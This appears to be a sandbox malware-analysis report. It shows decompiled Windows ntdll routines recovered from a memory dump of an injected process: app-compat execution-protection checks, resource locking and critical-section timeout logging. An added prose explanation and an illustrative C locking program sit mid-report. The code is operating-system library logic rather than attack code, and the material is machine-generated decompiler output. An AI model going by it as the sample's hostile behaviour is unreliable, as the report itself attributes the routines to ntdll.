                                                0x01f08b04
                                                0x01f51bf8
                                                0x01f51c0e
                                                0x01f51c13
                                                0x01f51c16
                                                0x01f51c16
                                                0x01f51bf8
                                                0x00000000
                                                0x01f08b04
                                                0x01f08a0e
                                                0x01f08a11
                                                0x01f08a14
                                                0x01f08a15
                                                0x01f08a18
                                                0x01f08a22
                                                0x01f08b59
                                                0x01f08a28
                                                0x01f08a3c
                                                0x01f08a3c
                                                0x01f08a42
                                                0x01f51bb0
                                                0x01f51b11

                                                APIs
                                                Strings
                                                • Kernel-MUI-Number-Allowed, xrefs: 01F087E6
                                                • Kernel-MUI-Language-Allowed, xrefs: 01F08827
                                                • WindowsExcludedProcs, xrefs: 01F087C1
                                                • Kernel-MUI-Language-Disallowed, xrefs: 01F08914
                                                • Kernel-MUI-Language-SKU, xrefs: 01F089FC
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: d82ef24d46757398d74ea8c15200f67d6999b24d9c5c4516f41c4e80577d66a1
                                                • Instruction ID: 1fff664a8a92b15addf44dca3aee80c5cb78a56f2ea97501dd66411d99482522
                                                • Opcode Fuzzy Hash: d82ef24d46757398d74ea8c15200f67d6999b24d9c5c4516f41c4e80577d66a1
                                                • Instruction Fuzzy Hash: 14F12BB2D0024AEFCF52DF98C9849EEBBF8FF08300F15546AE605A7251E731AA41DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E01F17EFD(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v540;
                                                				unsigned int _v544;
                                                				signed int _v548;
                                                				intOrPtr _v552;
                                                				char _v556;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t33;
                                                				void* _t38;
                                                				unsigned int _t46;
                                                				unsigned int _t47;
                                                				unsigned int _t52;
                                                				intOrPtr _t56;
                                                				unsigned int _t62;
                                                				void* _t69;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t73;
                                                				void* _t74;
                                                				void* _t75;
                                                				void* _t76;
                                                				void* _t77;
                                                
                                                				_t33 =  *0x1fc2088; // 0x76a512a7
                                                				_v8 = _t33 ^ _t73;
                                                				_v548 = _v548 & 0x00000000;
                                                				_t72 = _a4;
                                                				if(E01F17F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                					__eflags = _v548;
                                                					if(_v548 == 0) {
                                                						goto L1;
                                                					}
                                                					_t62 = _t72 + 0x24;
                                                					E01F33F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                					_t71 = 0x214;
                                                					_v544 = 0x214;
                                                					E01EEDFC0( &_v540, 0, 0x214);
                                                					_t75 = _t74 + 0x20;
                                                					_t46 =  *0x1fc4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                					__eflags = _t46;
                                                					if(_t46 == 0) {
                                                						goto L1;
                                                					}
                                                					_t47 = _v544;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						goto L1;
                                                					}
                                                					__eflags = _t47 - 0x214;
                                                					if(_t47 >= 0x214) {
                                                						goto L1;
                                                					}
                                                					_push(_t62);
                                                					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                					E01F33F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                					_t52 = E01EF0D27( &_v540, L"Execute=1");
                                                					_t76 = _t75 + 0x1c;
                                                					_push(_t62);
                                                					__eflags = _t52;
                                                					if(_t52 == 0) {
                                                						E01F33F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                						_t71 =  &_v540;
                                                						_t56 = _t73 + _v544 - 0x218;
                                                						_t77 = _t76 + 0x14;
                                                						_v552 = _t56;
                                                						__eflags = _t71 - _t56;
                                                						if(_t71 >= _t56) {
                                                							goto L1;
                                                						} else {
                                                							goto L10;
                                                						}
                                                						while(1) {
                                                							L10:
                                                							_t62 = E01EF8375(_t71, 0x20);
                                                							_pop(_t69);
                                                							__eflags = _t62;
                                                							if(__eflags != 0) {
                                                								__eflags = 0;
                                                								 *_t62 = 0;
                                                							}
                                                							E01F33F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                							_t77 = _t77 + 0x10;
                                                							E01F5E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                							__eflags = _t62;
                                                							if(_t62 == 0) {
                                                								goto L1;
                                                							}
                                                							_t31 = _t62 + 2; // 0x2
                                                							_t71 = _t31;
                                                							__eflags = _t71 - _v552;
                                                							if(_t71 >= _v552) {
                                                								goto L1;
                                                							}
                                                						}
                                                					}
                                                					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                					_push(3);
                                                					_push(0x55);
                                                					E01F33F92();
                                                					_t38 = 1;
                                                					L2:
                                                					return E01EEE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                				}
                                                				L1:
                                                				_t38 = 0;
                                                				goto L2;
                                                			}


                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01F33F12
                                                Strings
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01F3E345
                                                • ExecuteOptions, xrefs: 01F33F04
                                                • Execute=1, xrefs: 01F33F5E
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01F33EC4
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01F3E2FB
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01F33F75
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01F33F4A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: dd3548102399822414c88c05d2604e30f055773256226ec9e077ab1a1121f223
                                                • Instruction ID: 29f11cbbef3b9749a65e08b78eb2cfbe1bda6bae38089a2e6a39fd06144d5357
                                                • Opcode Fuzzy Hash: dd3548102399822414c88c05d2604e30f055773256226ec9e077ab1a1121f223
                                                • Instruction Fuzzy Hash: E941D971A8021DBADB20EE94DC89FDF73FCAF54700F0005A9A609E6085E771DA46CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E01F053A5(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t32;
                                                				signed int _t37;
                                                				signed int _t40;
                                                				signed int _t42;
                                                				void* _t45;
                                                				intOrPtr _t46;
                                                				signed int _t49;
                                                				void* _t51;
                                                				signed int _t57;
                                                				signed int _t64;
                                                				signed int _t71;
                                                				void* _t74;
                                                				intOrPtr _t78;
                                                				signed int* _t79;
                                                				void* _t85;
                                                				signed int _t86;
                                                				signed int _t92;
                                                				void* _t104;
                                                				void* _t105;
                                                
                                                				_t64 = _a4;
                                                				_t32 =  *(_t64 + 0x28);
                                                				_t71 = _t64 + 0x28;
                                                				_push(_t92);
                                                				if(_t32 < 0) {
                                                					_t78 =  *[fs:0x18];
                                                					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                						goto L3;
                                                					} else {
                                                						__eflags = _t32 | 0xffffffff;
                                                						asm("lock xadd [ecx], eax");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L3:
                                                					_push(_t86);
                                                					while(1) {
                                                						L4:
                                                						__eflags = _t32;
                                                						if(_t32 == 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                							_t79 = _t64 + 0x24;
                                                							_t71 = 1;
                                                							asm("lock xadd [eax], ecx");
                                                							_t32 =  *(_t64 + 0x28);
                                                							_a4 = _t32;
                                                							__eflags = _t32;
                                                							if(_t32 != 0) {
                                                								L19:
                                                								_t86 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x01fc01c0;
                                                									_push(_t92);
                                                									_push(0);
                                                									_t37 = E01EDF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                									__eflags = _t37 - 0x102;
                                                									if(_t37 != 0x102) {
                                                										break;
                                                									}
                                                									_t71 =  *(_t92 + 4);
                                                									_t85 =  *_t92;
                                                									_t51 = E01F24FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                									_push(_t85);
                                                									_push(_t51);
                                                									E01F33F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                									E01F33F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                									_t86 = _t86 + 1;
                                                									_t105 = _t104 + 0x28;
                                                									__eflags = _t86 - 2;
                                                									if(__eflags > 0) {
                                                										E01F6217A(_t71, __eflags, _t64);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									E01F33F92();
                                                									_t104 = _t105 + 0xc;
                                                								}
                                                								__eflags = _t37;
                                                								if(__eflags < 0) {
                                                									_push(_t37);
                                                									E01F23915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                									asm("int3");
                                                									_t40 =  *_t71;
                                                									 *_t71 = 0;
                                                									__eflags = _t40;
                                                									if(_t40 == 0) {
                                                										L1:
                                                										_t42 = E01F05384(_t92 + 0x24);
                                                										if(_t42 != 0) {
                                                											goto L31;
                                                										} else {
                                                											goto L2;
                                                										}
                                                									} else {
                                                										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                										_push( &_a4);
                                                										_push(_t40);
                                                										_t49 = E01EDF970( *((intOrPtr*)(_t92 + 0x18)));
                                                										__eflags = _t49;
                                                										if(__eflags >= 0) {
                                                											goto L1;
                                                										} else {
                                                											_push(_t49);
                                                											E01F23915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                											L31:
                                                											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                											_push( &_a4);
                                                											_push(1);
                                                											_t42 = E01EDF970( *((intOrPtr*)(_t92 + 0x20)));
                                                											__eflags = _t42;
                                                											if(__eflags >= 0) {
                                                												L2:
                                                												return _t42;
                                                											} else {
                                                												_push(_t42);
                                                												E01F23915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                												_push( &_a4);
                                                												_push(1);
                                                												_t42 = E01EDF970( *((intOrPtr*)(_t92 + 0x20)));
                                                												__eflags = _t42;
                                                												if(__eflags >= 0) {
                                                													goto L2;
                                                												} else {
                                                													_push(_t42);
                                                													_t45 = E01F23915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                													asm("int3");
                                                													while(1) {
                                                														_t74 = _t45;
                                                														__eflags = _t45 - 1;
                                                														if(_t45 != 1) {
                                                															break;
                                                														}
                                                														_t86 = _t86 | 0xffffffff;
                                                														_t45 = _t74;
                                                														asm("lock cmpxchg [ebx], edi");
                                                														__eflags = _t45 - _t74;
                                                														if(_t45 != _t74) {
                                                															continue;
                                                														} else {
                                                															_t46 =  *[fs:0x18];
                                                															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                															return _t46;
                                                														}
                                                														goto L37;
                                                													}
                                                													E01F05329(_t74, _t92);
                                                													_push(1);
                                                													return E01F053A5(_t92);
                                                												}
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									_t32 =  *(_t64 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t71 =  *_t79;
                                                								__eflags = _t71;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t57 = _t71;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t57 - _t71;
                                                										if(_t57 == _t71) {
                                                											break;
                                                										}
                                                										_t71 = _t57;
                                                										__eflags = _t57;
                                                										if(_t57 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									_t32 = _a4;
                                                									__eflags = _t71;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L19;
                                                								}
                                                							}
                                                						}
                                                						goto L37;
                                                					}
                                                					_t71 = _t71 | 0xffffffff;
                                                					_t32 = 0;
                                                					asm("lock cmpxchg [edx], ecx");
                                                					__eflags = 0;
                                                					if(0 != 0) {
                                                						goto L4;
                                                					} else {
                                                						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                						return 1;
                                                					}
                                                				}
                                                				L37:
                                                			}

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F422F4
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 01F42328
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01F422FC
                                                • RTL: Resource at %p, xrefs: 01F4230B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: dd79e0a3ef876f14f013e40fb3da89c0055c6abf0e92e41c368a5120a637aeb5
                                                • Instruction ID: ff5da73727d34c84ab35edcfad5c472bb18173b8833a0b6a7d96a7d3fffd92fc
                                                • Opcode Fuzzy Hash: dd79e0a3ef876f14f013e40fb3da89c0055c6abf0e92e41c368a5120a637aeb5
                                                • Instruction Fuzzy Hash: 39512E71B00716ABEB16DF68DC80FAA77DDEF54310F104229FD45DB281E6A3D9428B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%
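The three "RTL:" strings listed above are ntdll.dll's own resource-timeout diagnostics, so the routine decompiled above is Windows library code that sits in the dumped region of the injected process, not logic written by the sample. What it does is easier to see in readable form: a single `lock cmpxchg` from 0 to -1 takes the resource on the fast path and records the owning thread from the TEB, otherwise the caller registers as a waiter with `lock xadd`, waits, and on every STATUS_TIMEOUT (0x102) logs the timeout count and the timeout converted to seconds (the 0xff676980 divisor is -10000000, i.e. 100 ns units per second) before re-waiting. The following C program is an added illustration of that pattern, not code from the report or from ntdll: the `fake_resource` layout, every function name and the scripted wait callback that stands in for the kernel wait are assumptions constructed for the example.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* NTSTATUS values the decompiled loops compare against (real Windows constants). */
#define STATUS_SUCCESS 0x00000000
#define STATUS_TIMEOUT 0x00000102

/* 0xff676980 as a signed 32-bit value is -10000000: the divisor the decompiled
   code hands its 64-bit divide to turn a relative 100 ns timeout into seconds. */
#define HUNDRED_NS_PER_SEC 10000000LL

/* Hypothetical resource record (assumption for illustration). The field roles
   mirror what the decompiler touched: a lock count that goes 0 -> -1 on an
   exclusive acquire, a waiter count bumped with lock xadd, an owner slot. */
typedef struct {
    atomic_int lock_count;     /* 0 free, -1 held exclusively, >0 shared holders */
    atomic_int waiters;        /* exclusive waiters registered on the semaphore */
    uint32_t   owning_thread;  /* written on a successful exclusive acquire */
    unsigned   timeout_count;  /* number of STATUS_TIMEOUT wakeups logged */
} fake_resource;

static void fake_resource_init(fake_resource *r) {
    atomic_init(&r->lock_count, 0);
    atomic_init(&r->waiters, 0);
    r->owning_thread = 0;
    r->timeout_count = 0;
}

/* Constructed stand-in for the kernel wait: reports STATUS_TIMEOUT a chosen
   number of times, then succeeds, so the re-wait loop runs deterministically. */
typedef int (*wait_fn)(void *ctx);
typedef struct { int timeouts_left; } scripted_wait;

static int scripted_wait_fn(void *ctx) {
    scripted_wait *s = ctx;
    if (s->timeouts_left > 0) {
        s->timeouts_left--;
        return STATUS_TIMEOUT;
    }
    return STATUS_SUCCESS;
}

/* Fast path: the single compare-and-swap from 0 to -1, then record the owner. */
static bool try_acquire_exclusive(fake_resource *r, uint32_t tid) {
    int expected = 0;
    if (atomic_compare_exchange_strong(&r->lock_count, &expected, -1)) {
        r->owning_thread = tid;
        return true;
    }
    return false;
}

/* Slow path: register as a waiter, wait, and on every STATUS_TIMEOUT emit the
   three diagnostics the report lists under Strings before waiting again. A
   negative NTSTATUS ends the loop (the decompiled code raises it; here it is
   simply returned to the caller). */
static int acquire_exclusive_slow(fake_resource *r, uint32_t tid,
                                  int64_t relative_timeout_100ns,
                                  wait_fn wait, void *ctx) {
    atomic_fetch_add(&r->waiters, 1);
    unsigned rounds = 0;
    int status;
    while ((status = wait(ctx)) == STATUS_TIMEOUT) {
        r->timeout_count++;
        /* negative relative timeout / negative divisor == positive seconds */
        long long secs = relative_timeout_100ns / -HUNDRED_NS_PER_SEC;
        printf("RTL: Acquire Exclusive Sem Timeout %u (%lld secs)\n", rounds, secs);
        printf("RTL: Resource at %p\n", (void *)r);
        printf("RTL: Re-Waiting\n");
        rounds++;
    }
    atomic_fetch_sub(&r->waiters, 1);
    if (status < 0) {
        return status;
    }
    /* The releaser handed the resource over: mark it held and record the owner. */
    atomic_store(&r->lock_count, -1);
    r->owning_thread = tid;
    return STATUS_SUCCESS;
}

/* What a caller sees: fast path first, then the waiting slow path. */
static int acquire_exclusive(fake_resource *r, uint32_t tid,
                             int64_t relative_timeout_100ns,
                             wait_fn wait, void *ctx) {
    if (try_acquire_exclusive(r, tid)) {
        return STATUS_SUCCESS;
    }
    return acquire_exclusive_slow(r, tid, relative_timeout_100ns, wait, ctx);
}

static void release_exclusive(fake_resource *r) {
    r->owning_thread = 0;
    atomic_store(&r->lock_count, 0);
}

int main(void) {
    fake_resource r;
    fake_resource_init(&r);
    try_acquire_exclusive(&r, 0x1000);          /* first thread takes it directly */
    scripted_wait sw = { 3 };                    /* second thread times out 3 times */
    int st = acquire_exclusive(&r, 0x2000, -30 * HUNDRED_NS_PER_SEC, scripted_wait_fn, &sw);
    printf("status=0x%x owner=0x%x timeouts=%u\n", st, r.owning_thread, r.timeout_count);
    release_exclusive(&r);
    return 0;
}
```

Seeing the same pattern in the critical-section routine that follows ("RTL: Enter Critical Section Timeout") is expected: both are ntdll wait paths that only log when the timeout-checking debug behaviour is active, and neither carries any indicator specific to this sample.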

                                                C-Code - Quality: 51%
                                                			E01F0EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				signed int _v24;
                                                				intOrPtr* _v28;
                                                				intOrPtr _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				short _v66;
                                                				char _v72;
                                                				void* __esi;
                                                				intOrPtr _t38;
                                                				intOrPtr _t39;
                                                				signed int _t40;
                                                				intOrPtr _t42;
                                                				intOrPtr _t43;
                                                				signed int _t44;
                                                				void* _t46;
                                                				intOrPtr _t48;
                                                				signed int _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t53;
                                                				signed char _t67;
                                                				void* _t72;
                                                				intOrPtr _t77;
                                                				intOrPtr* _t80;
                                                				intOrPtr _t84;
                                                				intOrPtr* _t85;
                                                				void* _t91;
                                                				void* _t92;
                                                				void* _t93;
                                                
                                                				_t80 = __edi;
                                                				_t75 = __edx;
                                                				_t70 = __ecx;
                                                				_t84 = _a4;
                                                				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                					E01EFDA92(__ecx, __edx, __eflags, _t84);
                                                					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                				}
                                                				_push(0);
                                                				__eflags = _t38 - 0xffffffff;
                                                				if(_t38 == 0xffffffff) {
                                                					_t39 =  *0x1fc793c; // 0x0
                                                					_push(0);
                                                					_push(_t84);
                                                					_t40 = E01EE16C0(_t39);
                                                				} else {
                                                					_t40 = E01EDF9D4(_t38);
                                                				}
                                                				_pop(_t85);
                                                				__eflags = _t40;
                                                				if(__eflags < 0) {
                                                					_push(_t40);
                                                					E01F23915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                					asm("int3");
                                                					while(1) {
                                                						L21:
                                                						_t76 =  *[fs:0x18];
                                                						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                							_v66 = 0x1722;
                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_t76 =  &_v72;
                                                							_push( &_v72);
                                                							_v28 = _t85;
                                                							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_push(0x10);
                                                							_push(0x20402);
                                                							E01EE01A4( *0x7ffe0382 & 0x000000ff);
                                                						}
                                                						while(1) {
                                                							_t43 = _v8;
                                                							_push(_t80);
                                                							_push(0);
                                                							__eflags = _t43 - 0xffffffff;
                                                							if(_t43 == 0xffffffff) {
                                                								_t71 =  *0x1fc793c; // 0x0
                                                								_push(_t85);
                                                								_t44 = E01EE1F28(_t71);
                                                							} else {
                                                								_t44 = E01EDF8CC(_t43);
                                                							}
                                                							__eflags = _t44 - 0x102;
                                                							if(_t44 != 0x102) {
                                                								__eflags = _t44;
                                                								if(__eflags < 0) {
                                                									_push(_t44);
                                                									E01F23915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                									asm("int3");
                                                									E01F62306(_t85);
                                                									__eflags = _t67 & 0x00000002;
                                                									if((_t67 & 0x00000002) != 0) {
                                                										_t7 = _t67 + 2; // 0x4
                                                										_t72 = _t7;
                                                										asm("lock cmpxchg [edi], ecx");
                                                										__eflags = _t67 - _t67;
                                                										if(_t67 == _t67) {
                                                											E01F0EC56(_t72, _t76, _t80, _t85);
                                                										}
                                                									}
                                                									return 0;
                                                								} else {
                                                									__eflags = _v24;
                                                									if(_v24 != 0) {
                                                										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                									}
                                                									return 2;
                                                								}
                                                								goto L36;
                                                							}
                                                							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                							_push(_t67);
                                                							_t46 = E01F24FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                							_push(_t77);
                                                							E01F33F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                							_t48 =  *_t85;
                                                							_t92 = _t91 + 0x18;
                                                							__eflags = _t48 - 0xffffffff;
                                                							if(_t48 == 0xffffffff) {
                                                								_t49 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                							}
                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_push(_t49);
                                                							_t50 = _v12;
                                                							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                							_push(_t85);
                                                							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                							E01F33F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                							_t53 =  *_t85;
                                                							_t93 = _t92 + 0x20;
                                                							_t67 = _t67 + 1;
                                                							__eflags = _t53 - 0xffffffff;
                                                							if(_t53 != 0xffffffff) {
                                                								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                							}
                                                							__eflags = _t67 - 2;
                                                							if(_t67 > 2) {
                                                								__eflags = _t85 - 0x1fc20c0;
                                                								if(_t85 != 0x1fc20c0) {
                                                									_t76 = _a4;
                                                									__eflags = _a4 - _a8;
                                                									if(__eflags == 0) {
                                                										E01F6217A(_t71, __eflags, _t85);
                                                									}
                                                								}
                                                							}
                                                							_push("RTL: Re-Waiting\n");
                                                							_push(0);
                                                							_push(0x65);
                                                							_a8 = _a4;
                                                							E01F33F92();
                                                							_t91 = _t93 + 0xc;
                                                							__eflags =  *0x7ffe0382;
                                                							if( *0x7ffe0382 != 0) {
                                                								goto L21;
                                                							}
                                                						}
                                                						goto L36;
                                                					}
                                                				} else {
                                                					return _t40;
                                                				}
                                                				L36:
                                                			}


                                                Strings
                                                • RTL: Re-Waiting, xrefs: 01F424FA
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01F4248D
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01F424BD
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 84b0572a1ee31b626cb6034572bf481f14592e2b9403437531198f8362fe630d
                                                • Instruction ID: e3d94cdb6bbb500a2bfc3c1f30b17af26ded59282a00e3e17367e8770bc31331
                                                • Opcode Fuzzy Hash: 84b0572a1ee31b626cb6034572bf481f14592e2b9403437531198f8362fe630d
                                                • Instruction Fuzzy Hash: 534118B1A00605EBD720DB68DC89F6E7BB8EF84320F108A19F6559B2D1D736E941C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%
